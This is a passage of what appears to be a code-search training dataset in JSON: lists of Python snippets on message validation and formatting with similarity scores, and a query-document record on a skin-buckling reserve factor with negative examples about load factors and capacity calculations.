add_error(\"Field 'REF:' must be once in %s\" % commitish)\n continue\n\n if COMMIT_MESSAGE_CHECK and not Commit.rt_header_fields['REF: '].match(line[len('REF: '):]):\n add_error(\"Wrong field 'REF:' in %s\" % commitish)\n else:\n hdr.ref = line[len('REF: '):]\n\n elif line.find('Signed-off-by: ') == 0:\n if hdr.signed == None:\n hdr.signed = 1 # Not None\n elif COMMIT_MESSAGE_CHECK:\n add_error(\"Field 'Signed-off-by:' must be once in %s\" % commitish)\n continue\n\n if COMMIT_MESSAGE_CHECK and not Commit.rt_header_fields['Signed-off-by: '].match(line[len('Signed-off-by: '):]):\n add_error(\"Wrong field 'Signed-off-by:' in %s\" % commitish)\n else:\n hdr.signed = line[len('Signed-off-by: '):]\n\n elif len(line) != 0:\n hdr.desc = 1\n if COMMIT_MESSAGE_CHECK and len(line) > 78:\n add_error(\"Wrong size (%d) of field 'Description' in %s\" % (len(line), commitish))\n\n if COMMIT_MESSAGE_CHECK and hdr.ref == None:\n add_error(\"No field 'REF:' in %s\" % commitish)\n if COMMIT_MESSAGE_CHECK and hdr.desc == None:\n add_error(\"No field 'Description' in %s\" % commitish)\n if COMMIT_MESSAGE_CHECK and hdr.signed == None:\n add_error(\"No field 'Signed-off-by:' in %s\" % commitish)\n\n return hdr", "def format_message(self, message):\n return \"%s at %s\" % (\n message[0], time.asctime(time.localtime(message[1])))", "def test_no_errors(self):\n test_error = \"\\r\\n--------------------------------------------------------------------\\r\\n\"\\\n \"Your code has been rated at 10.00/10 (previous run: 9.33/10, +0.67)\"\n\n self.assertEqual(\n format_errors(test_error),\n None\n )", "def _is_consistent(self) -> bool:\n try:\n enforce(\n isinstance(self.dialogue_reference, tuple),\n \"Invalid type for 'dialogue_reference'. Expected 'tuple'. Found '{}'.\".format(\n type(self.dialogue_reference)\n ),\n )\n enforce(\n isinstance(self.dialogue_reference[0], str),\n \"Invalid type for 'dialogue_reference[0]'. Expected 'str'. Found '{}'.\".format(\n type(self.dialogue_reference[0])\n ),\n )\n enforce(\n isinstance(self.dialogue_reference[1], str),\n \"Invalid type for 'dialogue_reference[1]'. Expected 'str'. Found '{}'.\".format(\n type(self.dialogue_reference[1])\n ),\n )\n enforce(\n type(self.message_id) is int,\n \"Invalid type for 'message_id'. Expected 'int'. Found '{}'.\".format(\n type(self.message_id)\n ),\n )\n enforce(\n type(self.target) is int,\n \"Invalid type for 'target'. Expected 'int'. Found '{}'.\".format(\n type(self.target)\n ),\n )\n\n # Light Protocol Rule 2\n # Check correct performative\n enforce(\n isinstance(self.performative, SigningMessage.Performative),\n \"Invalid 'performative'. Expected either of '{}'. Found '{}'.\".format(\n self.valid_performatives, self.performative\n ),\n )\n\n # Check correct contents\n actual_nb_of_contents = len(self._body) - DEFAULT_BODY_SIZE\n expected_nb_of_contents = 0\n if self.performative == SigningMessage.Performative.SIGN_TRANSACTION:\n expected_nb_of_contents = 2\n enforce(\n isinstance(self.terms, CustomTerms),\n \"Invalid type for content 'terms'. Expected 'Terms'. Found '{}'.\".format(\n type(self.terms)\n ),\n )\n enforce(\n isinstance(self.raw_transaction, CustomRawTransaction),\n \"Invalid type for content 'raw_transaction'. Expected 'RawTransaction'. Found '{}'.\".format(\n type(self.raw_transaction)\n ),\n )\n elif self.performative == SigningMessage.Performative.SIGN_MESSAGE:\n expected_nb_of_contents = 2\n enforce(\n isinstance(self.terms, CustomTerms),\n \"Invalid type for content 'terms'. Expected 'Terms'. Found '{}'.\".format(\n type(self.terms)\n ),\n )\n enforce(\n isinstance(self.raw_message, CustomRawMessage),\n \"Invalid type for content 'raw_message'. Expected 'RawMessage'. Found '{}'.\".format(\n type(self.raw_message)\n ),\n )\n elif self.performative == SigningMessage.Performative.SIGNED_TRANSACTION:\n expected_nb_of_contents = 1\n enforce(\n isinstance(self.signed_transaction, CustomSignedTransaction),\n \"Invalid type for content 'signed_transaction'. Expected 'SignedTransaction'. Found '{}'.\".format(\n type(self.signed_transaction)\n ),\n )\n elif self.performative == SigningMessage.Performative.SIGNED_MESSAGE:\n expected_nb_of_contents = 1\n enforce(\n isinstance(self.signed_message, CustomSignedMessage),\n \"Invalid type for content 'signed_message'. Expected 'SignedMessage'. Found '{}'.\".format(\n type(self.signed_message)\n ),\n )\n elif self.performative == SigningMessage.Performative.ERROR:\n expected_nb_of_contents = 1\n enforce(\n isinstance(self.error_code, CustomErrorCode),\n \"Invalid type for content 'error_code'. Expected 'ErrorCode'. Found '{}'.\".format(\n type(self.error_code)\n ),\n )\n\n # Check correct content count\n enforce(\n expected_nb_of_contents == actual_nb_of_contents,\n \"Incorrect number of contents. Expected {}. Found {}\".format(\n expected_nb_of_contents, actual_nb_of_contents\n ),\n )\n\n # Light Protocol Rule 3\n if self.message_id == 1:\n enforce(\n self.target == 0,\n \"Invalid 'target'. Expected 0 (because 'message_id' is 1). Found {}.\".format(\n self.target\n ),\n )\n except (AEAEnforceError, ValueError, KeyError) as e:\n _default_logger.error(str(e))\n return False\n\n return True", "def validate_message(self, message):\n\n for char in message:\n if ord(char) < 65 or ord(char) > 90:\n raise ValueError('Invalid message. Enigma Machine only supports messages composed of uppercase letters')", "def format(self, command, *params):\n\n\t\tif command.upper() not in self.commands:\n\t\t\traise InvalidCommandError(\"Unknown command\")\n\n\t\t# See RFC 2812 2.3 Messages (2nd paragraph)\n\t\tif len(params) > 15:\n\t\t\traise InvalidParameterCountError(\n\t\t\t\t\"Too much parameters (only 15 allowed)\"\n\t\t\t)\n\n\t\tm = \"{} {}\\r\\n\".format(command, \" \".join(str(x) for x in params))\n\n\t\tif len(m) > 512:\n\t\t\traise MessageTooLongError(\"Message exceeds 512 characters\")\n\n\t\treturn m", "def test_compose_email_somebad(self):\n pass", "def preprocess_msg(self):\n self.tmp_msg = self.tmp_msg.lower()\n cleared = ''\n for ch in self.tmp_msg:\n if ch in string.ascii_lowercase:\n cleared += ch\n\n c = ''\n for ch in cleared:\n c += '{:02d}'.format(ord(ch) - 97)\n if len(c) % 4 != 0:\n c += '99'\n self.tmp_msg = c\n\n super().preprocess_msg()", "def _check_consistency(message: Message, to: str, sender: str) -> Message:\n if message.has_to:\n enforce(\n message.to == to, \"To specified on message does not match envelope.\"\n )\n else:\n message.to = to\n if message.has_sender:\n enforce(\n message.sender == sender,\n \"Sender specified on message does not match envelope.\",\n )\n else:\n message.sender = sender\n return message", "def assert_message_valid(\n protocol: ProtocolMetaData,\n buf: bytes,\n encoded_message: List[Tuple[bytes, bytes]],\n decoded_message: Mapping[str, Any],\n sep: bytes,\n convert_sep_to_soh_for_checksum: bool\n) -> None:\n # Check the begin string.\n begin_string_field = protocol.fields_by_name['BeginString']\n begin_string_value = encode_value(\n protocol,\n begin_string_field,\n decoded_message[begin_string_field.name]\n )\n _assert_field_value_matches(\n begin_string_field,\n protocol.begin_string,\n begin_string_value\n )\n\n # Check the body length.\n body_length_field = protocol.fields_by_name['BodyLength']\n body_length_value = encode_value(\n protocol,\n body_length_field,\n decoded_message[body_length_field.name]\n )\n body_length = calc_body_length(buf, encoded_message, sep)\n _assert_field_value_matches(\n body_length_field,\n body_length_value,\n encode_value(protocol, body_length_field, body_length)\n )\n\n # Check the checksum.\n check_sum_field = protocol.fields_by_name['CheckSum']\n check_sum_value = encode_value(\n protocol,\n check_sum_field,\n decoded_message[check_sum_field.name]\n )\n check_sum = calc_checksum(buf, sep, convert_sep_to_soh_for_checksum)\n _assert_field_value_matches(\n check_sum_field,\n check_sum,\n check_sum_value\n )", "def test_messages(self):\n pass", "def _validate_format(self, full_encrypted_value, **options):\n\n if not self.FORMAT_REGEX.match(full_encrypted_value):\n raise InvalidEncryptedValueError('Input value is not a valid '\n '[{current}] encryption value.'\n .format(current=self._get_algorithm()))", "def __check(self, msg):\n msg = bytearray(msg)\n # Check that header is correct\n if msg[:2] != b'\\xFB\\xBF':\n return False\n # Check that ending is correct\n elif msg[-1:] != b'\\xED':\n return False\n # Check that check byte is correct\n elif msg[-2:-1] != bytes([sum(msg[2:-2]) % 256]):\n return False\n else:\n return True", "def parsed_error_msg(self):\r\n return self.error_msg", "def test_small_message(self):\n message = \"few characters\"\n message_displayed = truncate_message(message, limit=50)\n\n self.assertLessEqual(len(message_displayed), 50)\n self.assertEqual(message_displayed, \"few characters\")", "def test_init_with_invalid_body(self):\n body = {'foo': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert \"{'event_name': 'Required'}\" in str(excinfo.value)\n\n body = {'event_name': 2}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)\n\n body = {'event_name': 'job.'}\n with pytest.raises(ValueError) as excinfo:\n SQSMessage(self.schema, body=body)\n\n assert 'String does not match expected pattern' in str(excinfo.value)", "def test_cli_format_error_handler_messages_broken():\n resp_val = \"\"\"\n{\n \"apiVersion\": \"v1.0\",\n \"status\": \"Failure\",\n \"metadata\": {},\n \"message\": \"Unauthenticated\",\n \"code\": \"401 Unauthorized\",\n \"details\": {\n \"messageList\": [\n { \"message\":\"Hello1\", \"error\": false },\n { \"error\": true },\n { \"message\":\"Hello3\" }\n ]\n },\n \"kind\": \"status\",\n \"reason\": \"Credentials are not established\"\n}\n\"\"\"\n resp = MagicMock()\n resp.json = MagicMock(return_value=json.loads(resp_val))\n output = format_utils.cli_format_error_handler(resp)\n assert \"Error: Unauthenticated\" in output\n assert \"Reason: Credentials are not established\" in output\n assert \"- Error: None\" in output\n assert \"- Info: Hello3\" in output", "def format(self, record):\n record.message = indent_string(record.getMessage())\n if \"%(asctime)\" in self._fmt:\n record.asctime = self.formatTime(record, self.datefmt)\n s = self._fmt % record.__dict__\n if record.exc_info:\n # Cache the traceback text to avoid converting it multiple times\n # (it's constant anyway)\n if not record.exc_text:\n record.exc_text = self.formatException(record.exc_info)\n if record.exc_text:\n if s[-1:] != \"\\n\":\n s = s + \"\\n\"\n s = \"{0} Exception:\\n {1}\".format(s, indent_string(record.exc_text))\n return s", "def testStr_NoFieldName(self):\n self.assertEquals('Validation error',\n str(messages.ValidationError('Validation error')))", "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def test_sufficientWidth(self):\n msg = \"barbazbo\"\n maxLen = len(\"PRIVMSG foo :{}\".format(msg)) + 2\n self.client.msg(\"foo\", msg, maxLen)\n self.assertEqual(self.client.lines, [\"PRIVMSG foo :{}\".format(msg)])\n self.client.lines = []\n self.client.msg(\"foo\", msg, maxLen - 1)\n self.assertEqual(2, len(self.client.lines))\n self.client.lines = []\n self.client.msg(\"foo\", msg, maxLen + 1)\n self.assertEqual(1, len(self.client.lines))", "def send(self):\n if self._valid:\n try:\n self.connection.sendmail(self.sender, self.receiver, self.formatted_message)\n return 0, f'Successfully sent email {self.sender} -> {self.receiver}'\n except Exception as e:\n return 2, str(e)\n else:\n return 1, 'Invalid email formatting, message not sent'", "def determineMessageValidity(message):\n return Sentience._determineMessagePositivityWrapper(message, overall=False)", "def handle_message(self, message):", "def format(self, record, *args, **kwargs):\n if (\n (\n hasattr(record, 'line_number') or\n hasattr(record, 'line_number_list') or\n hasattr(record, 'column_number') or\n hasattr(record, 'column_number_list'))\n and not hasattr(record, 'filename_')):\n raise ValueError(\n 'Tried to log about a line/column with no filename')\n return super(ValidationMessageFormatter, self).format(record,\n *args,\n **kwargs)", "def test_incorrect_formats(self, text):\n with pytest.raises(ValueError):\n parse_changelog(text)", "def validate(self):\n\n if not (self.from_currency and self.to_currency):\n return \"Please you should provide two currencies\"\n if not self.date:\n self.date = \"latest\"\n else:\n try:\n datetime.strptime(self.date, \"%Y-%m-%d\")\n except ValueError as err:\n return str(err)", "async def goodbye_message(self, ctx, *, message):\n if message.lower() == \"default\":\n message = None\n\n await queries.update_setting(ctx, \"goodbye_settings\", \"message_format\", message)\n\n preview = util.create_goodbye_message(ctx.author, ctx.guild, message)\n await ctx.send(\n f\":white_check_mark: New goodbye message format set:\\n```{message}```Preview:\\n\\n{preview}\"\n )", "def test_long_message(self):\n message = \"few characters\"\n message_displayed = truncate_message(message, limit=5)\n\n self.assertLessEqual(len(message_displayed), 5)\n self.assertEqual(message_displayed, \"fe...\")", "def handle_message(self, msg):\n pass", "def formatEventMessage(self, message):\r\n\t\treturn format.formatEventMessage(message)", "def test_string_format():\n tree = parse(dedent(\"\"\"\\\n import logging\n\n logging.info(\"Hello {}\".format(\"World!\"))\n \"\"\"))\n visitor = LoggingVisitor()\n visitor.visit(tree)\n\n assert_that(visitor.violations, has_length(1))\n assert_that(visitor.violations[0][1], is_(equal_to(STRING_FORMAT_VIOLATION)))", "def test_phone_too_short(self):\n phone = Report(\n contact_phone='202',\n )\n\n try:\n phone.full_clean()\n except ValidationError as err:\n phone_error_message = err.message_dict['contact_phone']\n self.assertTrue(phone_error_message == ['Enter a valid value.'])", "def message_error_validator():\n\n return validator.MessageErrorSchema()", "def error(message):\n print str(message)", "def test_init_with_valid_body(self):\n body = {'event_name': 'job.created'}\n message = SQSMessage(self.schema, body=body)\n\n assert isinstance(message, SQSMessage)\n assert message.body == body", "def _check_line_is_good(self, string):\r\n # The standard requires we only accept strings ending in \\r\\n or \\n\r\n if (string[-1] != \"\\n\"):\r\n raise ParseError('Line endings were not as expected', string)\r\n \r\n # The standard places a limit on line lengths\r\n if (len(string)) > 512:\r\n raise ProtocolError('Line too long to be valid', string)\r\n \r\n # Trim our trailing whitespace/line endings\r\n return string.rstrip()", "def __validate_raw_message(raw_message: RawMessage) -> None:\n if not isinstance(raw_message, (tuple, list)):\n raise TypeError(\"'raw_message' is not list or tuple type\")\n if not all([isinstance(raw_byte, int) and 0x00 <= raw_byte <= 0xFF for raw_byte in raw_message]):\n raise ValueError(\"'raw_message' does not contain raw bytes (int value between 0 and 255) values only\")", "def test_parseUnformattedText(self):\n self.assertEqual(irc.parseFormattedText(\"hello\"), A.normal[\"hello\"])", "def test_cli_format_status_handler_messages():\n resp_val = \"\"\"\n{\n \"apiVersion\": \"v1.0\",\n \"status\": \"Failure\",\n \"metadata\": {},\n \"message\": \"Component Validation Failed\",\n \"code\": 400,\n \"details\": {\n \"errorCount\": 4,\n \"messageList\": [\n { \"message\":\"Info something you might want to know\",\n \"error\": false,\n \"kind\": \"ValidationMessage\",\n \"name\": \"val0\",\n \"documents\": [\n { \"schema\": \"schema/schema/v1\",\n \"name\": \"someyaml\"\n }\n ],\n \"level\": \"Info\",\n \"source\": \"format-o-matic\"\n },\n { \"message\":\"Conflicting something\",\n \"error\": true,\n \"kind\": \"ValidationMessage\",\n \"name\": \"val1\",\n \"documents\": [\n { \"schema\": \"schema/schema/v1\",\n \"name\": \"someyaml\"\n }\n ],\n \"level\": \"Error\",\n \"diagnostic\": \"Make a doc change\"\n },\n { \"message\": \"Basic info\",\n \"error\": false,\n \"source\": \"Armadadock\"\n },\n { \"message\":\"Backwards something\",\n \"error\": true,\n \"kind\": \"ValidationMessage\",\n \"name\": \"val2\",\n \"documents\": [],\n \"level\": \"Error\"\n },\n { \"message\": \"Missing stuff\",\n \"error\": true\n },\n { \"message\":\"Broken syntax\",\n \"kind\": \"SimpleMessage\",\n \"error\": true,\n \"name\": null,\n \"diagnostic\": null\n }\n ]\n },\n \"kind\": \"Status\",\n \"reason\": \"Validation\"\n}\n\"\"\"\n expected = \"\"\"Error: Component Validation Failed\nReason: Validation\n- Error: val1\n Message: Conflicting something\n Diagnostic: Make a doc change\n Document: schema/schema/v1 - someyaml\n- Error: val2\n Message: Backwards something\n- Error: Missing stuff\n- Error: Broken syntax\n- Info: val0\n Message: Info something you might want to know\n Document: schema/schema/v1 - someyaml\n Source: format-o-matic\n- Info: Basic info\n Source: Armadadock\n\n#### Errors: 4, Warnings: 0, Infos: 2, Other: 0 ####\"\"\"\n resp = MagicMock()\n resp.json = MagicMock(return_value=json.loads(resp_val))\n output = format_utils.cli_format_status_handler(resp, is_error=True)\n assert output == expected", "def handle_message(self, message):\n print \"[WARNING] No message handling implemented!\"", "def validation_event(self, message):", "def __str__(self):\n return \"Improperly formatted request: \" + self.source + \", resulting in exception: \" + self.bad", "def _check_tokens_are_valid(format_string, message):\n named_tokens = re.findall(r\"{(\\w*)}\", format_string)\n invalid_tokens = [x for x in named_tokens if x.lower() not in _valid_tokens]\n if invalid_tokens:\n msg = message\n msg += \" [{0}]. \".format(\", \".join(invalid_tokens))\n msg += 'Did you check your \"modules.yaml\" configuration?'\n raise RuntimeError(msg)", "def format_fix_msg( msg, replace_timestamp=True, replace_length=True ) :\n\n _FULL_FIX_SENDTIME_RE = re.compile('\\x0152=[0-9]{8}-[0-9]{2}:[0-9]{2}:[0-9]{2}(\\\\.[0-9]{3})?\\x01')\n _LENGTH_RE = re.compile('(\\x019=[0-9]*)\\x01')\n\n if replace_timestamp :\n # as a last just-in-case, we'll see if the user already put in a full-FIX-formatted ts\n # if so, leave it alone\n full_sendTime_present = _FULL_FIX_SENDTIME_RE.search(msg)\n if not full_sendTime_present :\n msg = replace_tag_value( msg, 52, time.strftime('%Y%m%d-%H:%M:%S',time.gmtime()) )\n\n # now calculate 9= length\n # hmm. length could be zero if both checksum & msg length aren't there\n len = msg.find('\\x0110=') - msg.find('\\x0135=')\n len_tag = _LENGTH_RE.search(msg)\n if len_tag and replace_length :\n msg = msg.replace( len_tag.group(1), '\\x019=' + str(len) )\n # now calculate checksum\n len_end = msg.find('\\x0110=')\n if len_end != -1 :\n checksum = 0\n for i in msg[:len_end+1] :\n checksum += ord(i)\n msg = msg[:len_end+1] + '10=' + \"%03d\" % (checksum % 256) + '\\x01'\n return msg", "def validate_format(self):\n return all(\n [\n self.validate_header_keyword(),\n self.validate_type_keyword(),\n self.validate_type_annotations(),\n self.validate_unique_header(),\n self.validate_against_header_count(),\n ]\n )", "def check_item(self, item: PoItem):\n for line in item.msgstr:\n if len(line) > MAX_LINE_LENGTH - 2: # 2 is for \"\"\n item.add_error(\n self.name,\n f\"Line too long ({len(line) + 2} > \"\n f\"{MAX_LINE_LENGTH}): {line}\",\n )", "def test_cli_format_error_handler_messages():\n resp_val = \"\"\"\n{\n \"apiVersion\": \"v1.0\",\n \"status\": \"Failure\",\n \"metadata\": {},\n \"message\": \"Unauthenticated\",\n \"code\": \"401 Unauthorized\",\n \"details\": {\n \"messageList\": [\n { \"message\":\"Hello1\", \"error\": false },\n { \"message\":\"Hello2\", \"error\": false },\n { \"message\":\"Hello3\", \"error\": true }\n ]\n },\n \"kind\": \"status\",\n \"reason\": \"Credentials are not established\"\n}\n\"\"\"\n resp = MagicMock()\n resp.json = MagicMock(return_value=json.loads(resp_val))\n output = format_utils.cli_format_error_handler(resp)\n assert \"Error: Unauthenticated\" in output\n assert \"Reason: Credentials are not established\" in output\n assert \"- Error: Hello3\" in output\n assert \"- Info: Hello2\" in output", "def test_make_user_message_extra_fields(self):\n msg_helper = MessageHelper()\n msg = msg_helper.make_user_message(\n 'outbound message', 'from', 'to', foo='bar', baz='quux')\n self.assert_message_fields(msg, {'foo': 'bar', 'baz': 'quux'})", "def test_error_type():\n assert error_type('{ \"from\" : \"\", \"to\" : \"\", \"success\" : false, \"error\" : \"\\\nSource currency code is invalid.\" }') == 1\n assert error_type('{ \"from\" : \"\", \"to\" : \"\", \"success\" : false, \"error\" : \"\\\nExchange currency code is invalid.\" }') == 2\n assert error_type('{ \"from\" : \"\", \"to\" : \"\", \"success\" : false, \"error\" : \"\\\nCurrency amount is invalid.\" }') == 3", "def built_error_message(self, key: str, params: List[str]) -> str:\n if key in self.errors:\n error_msg = self.errors[key]\n error_msg = re.sub(\"{..}\", \"\", error_msg)\n return error_msg.format(*params)\n else:\n return \"\"", "def parseable(message_data):\n if not message_data:\n raise TypeError('message_data must not be None')\n\n acceptable = range(97, 123) + range(65, 91) + range(48, 58) + range(33, 43) + range(44, 48) + [58, 63, 64, 94]\n return any(ord(c) not in acceptable for c in message_data['message'].replace(' ', ''))", "def _validate_ms(self, sprintf):\n #self.name2Id(sprintf)\n #re.sub(\"\\'.+?\\'\", 'Thing', fu)\n #self.ont.getSubClasses('fu', 0)\n return", "def test_text_multiline(self):\n self.assertEqual(DiscordReportFormatter().format(self.record(text=\"abc\\ndef\")), \":warning: **abc**\\ndef\")", "def _check_format(file_path, content):\n if not content:\n # testcase file content is empty\n err_msg = u\"Testcase file conetent is empty: {}\".format(file_path)\n logger.log_error(err_msg)\n raise exception.FileFormatError(err_msg)", "def test_compose_email_good(self): \n pass", "def display_message():" ]
[ "0.7444605", "0.69293326", "0.690031", "0.67062855", "0.66425115", "0.64710456", "0.64351165", "0.62836003", "0.62724143", "0.61536384", "0.6117061", "0.6076582", "0.6061003", "0.6058752", "0.6057646", "0.60355955", "0.6029556", "0.60024786", "0.599572", "0.59727937", "0.592433", "0.59200674", "0.59193283", "0.58969676", "0.58856845", "0.58790433", "0.58635217", "0.5851296", "0.5823519", "0.58071", "0.58044946", "0.5773297", "0.5768324", "0.5742123", "0.5738138", "0.57342", "0.5720252", "0.57040817", "0.5701406", "0.56932664", "0.56805664", "0.56587946", "0.56201166", "0.5594016", "0.5590385", "0.55796564", "0.55791324", "0.5557957", "0.5555515", "0.55536366", "0.5541155", "0.55286014", "0.55236906", "0.5513566", "0.5507585", "0.550522", "0.5504239", "0.5503216", "0.54916465", "0.5490332", "0.5481491", "0.547885", "0.54702353", "0.5469582", "0.54674023", "0.54650885", "0.5461376", "0.5450593", "0.54503727", "0.5448026", "0.5443046", "0.54424554", "0.5441066", "0.54403776", "0.5439755", "0.54217404", "0.5421134", "0.53977156", "0.5391584", "0.5388483", "0.5379458", "0.53737813", "0.5372896", "0.53685313", "0.53653026", "0.53567153", "0.5344882", "0.5334382", "0.53334975", "0.5320674", "0.5320606", "0.5320022", "0.5315856", "0.53150296", "0.53142387", "0.5310505", "0.53098875", "0.530656", "0.5300928", "0.5297961", "0.52965045" ]
0.0
-1
Calculate the reserve factor for Skin Buckling by calculating the critical load and comparing to the applied load. Return the reserve factor adjusted for inequalities based around ==0
def skinBuckle(dim): bst = dim[0] tst = dim[1] tsk = dim[2] epsilonk = kk*((tsk/bsk))**2 Et = (Esk*tsk)+(Est*((bst*tst)/bsk)) Nsk = Et*epsilonk # Critical Load rsf = Nsk/Nx return rsf - 1 # Using a target Reserve Factor of 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_load_factor(self):\n # Your code here\n return self.total_items / self.capacity", "def internal_external_canopy_heat_capacity(lumped_cover_heat_capacity: float) -> float:\n return 0.1 * lumped_cover_heat_capacity", "def calculate_effective_capacitance(self, load):\n c_load = load\n # In fF\n c_para = spice[\"min_tx_drain_c\"] * (self.nmos_size / parameter[\"min_tx_size\"])\n transition_prob = 0.1875\n return transition_prob * (c_load + c_para)", "def calculate_lower_boundary(self, divisor):\n\n # see how low you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n lowest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None or population is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = lowest_divisor - estimator\n else:\n lowest_divisor = divisor\n divisor = prev_divisor - estimator\n if lowest_divisor == divisor:\n break\n counter += 1\n return math.ceil(lowest_divisor * 1000) / 1000", "def calc_low_energy_bulb_ratio(lighting_outlets_total, lighting_outlets_low_energy):\n return int(100 * float(lighting_outlets_low_energy) / lighting_outlets_total + 0.5) / 100.0", "def quick_ratio(self):\n return (\n self.current_assets - self.inventory_net) / self.current_liabilities", "def get_additional_ball_capacity(self):\n return 999", "def ComputeRegenerativeBraking(self):\r\n pass", "def get_additional_ball_capacity(cls):\n return 999", "def get_amount_in(amount_out, reserve_in, reserve_out):\n assert amount_out > 0\n assert reserve_in > 0 and reserve_out > 0\n numerator = reserve_in*amount_out*1000\n denominator = (reserve_out - amount_out)*997\n return float(numerator/denominator + 1)", "def _load_factor(self):\n return self.size / len(self.buckets)", "def standard_init_price(self):\n # If a system can't use something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tu and _good.name not in 'fuel':\n base_price = 0\n else:\n base_price = _good.plt + (self.planet.tech_level * _good.pi)\n # if good is highly requested, increase the price\n if self.planet.status in [_good.dps]:\n base_price = base_price + (base_price * 0.5)\n # large system: high production decreases prices\n base_price = (base_price * (100 - self.planet.system_size)) / 100\n\n # price can't be negative\n if base_price < 0:\n base_price = 0\n\n return int(base_price)", "def spendFuelToSurvive(self):\n fuelNeeded = self.getLightUpkeep()\n woodNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"WOOD\"]\n )\n woodUsed = min(self.cargo[\"wood\"], woodNeeded)\n fuelNeeded -= woodUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"WOOD\"]\n self.cargo[\"wood\"] -= woodUsed\n if fuelNeeded <= 0:\n return True\n\n coalNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"COAL\"]\n )\n coalUsed = min(self.cargo[\"coal\"], coalNeeded)\n fuelNeeded -= coalUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"COAL\"]\n self.cargo[\"coal\"] -= coalUsed\n\n if fuelNeeded <= 0:\n return True\n\n uraniumNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"URANIUM\"]\n )\n uraniumUsed = min(self.cargo[\"uranium\"], uraniumNeeded)\n fuelNeeded -= uraniumUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"URANIUM\"]\n self.cargo[\"uranium\"] -= uraniumUsed\n\n if fuelNeeded <= 0:\n return True\n\n return fuelNeeded <= 0", "def base_reserve_0():\n print('Setting base reserve to 0')\n upgrade('basereserve', 'base_reserve_in_stroops', 0)", "def calcweight( self ):\n weight = 0\n zeroval = 0\n for sensor in ('right_top', 'right_bottom', 'left_top', 'left_bottom'):\n\t\treading = self.readings[sensor]\n\t\tcalibration = self.named_calibration[sensor]\n if sensor == 'right_top':\n zeroval = self.rtzv\n elif sensor == 'right_bottom':\n zeroval = self.rbzv\n elif sensor == 'left_top':\n zeroval = self.ltzv\n else:\n zeroval = self.lbzv\n\t\tif reading > calibration[2]:\n\t\t\tprint \"Warning, %s reading above upper calibration value\" % sensor\n\t\tif reading < calibration[1]:\n\t\t\tweight += 1700 * (reading + zeroval - calibration[0]) / (calibration[1] - calibration[0])\n\t\telse:\n\t\t\tweight += 1700 * (reading + zeroval - calibration[1]) / (calibration[2] - calibration[1]) + 1700\n\n if self.debug == 1:\n print \"weight calculated pre-conversion\", weight\n print \"return val\", self.converttolbs( weight / 100.0 )\n\n # return self.converttolbs( weight / 100.0 )\n return weight / 100.0", "def initial_cash_balance(self) -> float:\n return self.buy_budget * len(self.stocks)", "def penalty(self):\n return 0", "def load_factor(self) -> float:\n return self.filled_count / self.table_size", "def lower_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i <= support(stock):\n counter+=1\n return counter", "def weight(self):\n counters = [\n (\"total_mhz\", self.dominfo.vms_online + self.dominfo.cpus_online / 4.0),\n (\"memory\", self.dominfo.vms_online + self.dominfo.ram_online / 4096.0),\n ]\n load_w = sum((self.node[k] / float(v or 1)) / self.node[k] for k, v in counters)\n return load_w * self.srv_weight", "def volneeded(self, totalvol: float) -> float:\n return totalvol*self.final*1.0/self.stock", "def get_load_factor(self):\r\n return self.num_items / self.table_size", "def penalty_calc(self):\n self.p_budget = (self.tx_oma_min - self.rx_unstressed_sensitivity - self.fiber_conn_loss)*self.l_1\n\n # fiber attenuation,\n self.p_atten = self.alpha*self.length # column B\n\n # calculate bandwidth for RIN test (exclude transmitter)\n rin_inverse_bw = np.sqrt(np.square(1.0/self.bw_cd) + np.square(1.0/self.bw_md) + (0.477/(self.rx_bw**2))*self.l_1)\n rin_bw = 1.0 / rin_inverse_bw\n\n # see FC-MSQS-2 equation B.47 in Annex B.4 for the following k_rin = math.sqrt(2.0/math.pi)*erfinv(0.8)\n k_rin = 0.7\n\n # v_rin,\n self.v_rin = (k_rin*1E6*(self.rin_test_isi**2)*rin_bw*\n math.pow(10.0,0.1*self.rin)) # column AK\n\n # Prin,\n print('v_rin: ', self.v_rin)\n print('Q: ',self.Q)\n print('isi_dj_refl_closed :', self.isi_dj_refl_closed)\n self.p_rin = -10.0*np.log10(np.sqrt(1.0-np.multiply(self.v_rin, np.square(self.Q/self.isi_dj_refl_closed)))) # column R\n print(\"P_rin : \", self.p_rin)\n self.beta = (3.14159E-6*self.speedup*self.br_nominal *self.delta_lambda*self.d1*self.length) # column O\n self.sigma_mpn = (self.k_mpn/math.sqrt(2.0)*(self.l_1 -np.exp(-np.square(self.beta)))) # column P\n self.p_mpn = (-10.0*np.log10(np.sqrt(self.l_1 - (self.Q**2)*np.square(self.sigma_mpn)))) # column Q\n self.p_blw = (-10.0*math.log10(math.sqrt(1.0- ((self.Q*self.sigma_blw)/ self.isi_tp4_rx)**2))*self.l_1) # cell T13\n self.p_reflection = -10.0*np.log10(self.isi_reflection) # column N\n self.v_mn = (((1.0-math.pow(10.0,-0.2*self.pmn))/ (self.Q)**2)*self.l_1) # cell AG7\n print(\"isi_center : \", self.isi_center)\n\n self.p_isi_center = -10.0*np.log10(self.isi_center) # column J\n\n self.p_isi_corners = (-10.0*np.log10(self.isi_corners) - self.p_isi_center) # column K\n self.p_isi_dj_center = 